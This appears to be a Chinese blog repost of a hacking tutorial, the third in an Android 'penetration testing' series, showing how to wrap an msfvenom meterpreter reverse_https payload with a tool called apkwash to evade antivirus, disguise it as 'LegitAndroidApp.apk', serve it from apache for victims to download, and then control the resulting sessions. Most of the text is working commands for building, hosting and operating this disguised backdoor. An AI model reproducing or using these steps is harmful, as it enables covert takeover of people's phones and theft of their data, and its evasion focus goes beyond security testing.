【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

admin 2023年5月15日09:41:12评论33 views字数 1178阅读3分55秒阅读模式

欢迎回来,我的新手黑客

之前两期讲了如何使用msfvenom生成安卓有效载荷和如何利用获取到的meterpreter会话进行渗透攻击,今天来看一下如何对msfvenom生成的Payload进行免杀处理,这边我们会用到一个工具,使用该工具对Payload进行处理,该工具可以通过公众号后台回复APK面纱免费获取




首次运行时下载apktool.jar并将其放置在用户的/usr/local/bin目录中生成调试密钥库以进行签名

APKTool官网下载地址:

https://ibotpeaches.github.io/Apktool/

该工具的使用方法也蛮简单,一条命令就可以让完成

apkwash -p android/meterpreter/reverse_https LHOST=192.168.0.103 LPORT=443 -o LegitAndroidApp.apk

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

接下来稍微解释一下命令中出现的相关参数

-p | --payload <有效负载>这将设置由msfvenom生成的有效负载

LHOST |本地监听IP地址

LPORT |本地监听的端口 

-o | --output <outfile.apk>这将设置创建的APK的名称以及输出apk文件

稍微解释一下命令中可能用到的相关参数

-p | --payload <有效负载>这将设置由msfvenom生成的有效负载 

-o | --output <outfile.apk>这将设置创建的APK的名称以及输出apk文件

-x | --original <infile.apk>输入APK以将有效负载注入(以后更新)

-g | --generate使用默认值 

-n | 生成有效负载 --newkey在签名 

-v 之前生成一个新的调试密钥| --verbose不要屏蔽命令的输出 

-d | --debug将/ tmp / payload文件保留在适当位置以供查看 

-h | --help帮助信息

该工具使用msfvenom生成Payload之后,使用APKTool进行处理,可以从输出的日志信息中观察

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

处理过程中会出现提示信息

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

可以选择开启listener,该工具就自动使用msfconsole打开监听器,并设置相对应的参数

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

监听器设置完成,接下来开启apache,等待受害者下载并安装软件

service apache2 startmv LegitAndroidApp.apk /var/www/html/

当受害者安装并打开软件,就收到了会话

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

使用sessions查看会话信息

sessions -l

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

进入会话,查看系统相关信息

sessions -i 1sysinfo

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

查看本地时间以及进程信息

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

面纱效果可以自己测试,今天的分享就到这边




原创不易,帮我点点右下角的“在看”吧,欢迎转发跟同行分享,谢谢

【安卓渗透测试系列教程第三篇】安卓应用自动化面纱


原文始发于微信公众号(Kali渗透测试教程):【安卓渗透测试系列教程第三篇】安卓应用自动化面纱

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年5月15日09:41:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【安卓渗透测试系列教程第三篇】安卓应用自动化面纱http://cn-sec.com/archives/971898.html

发表评论

匿名网友 填写信息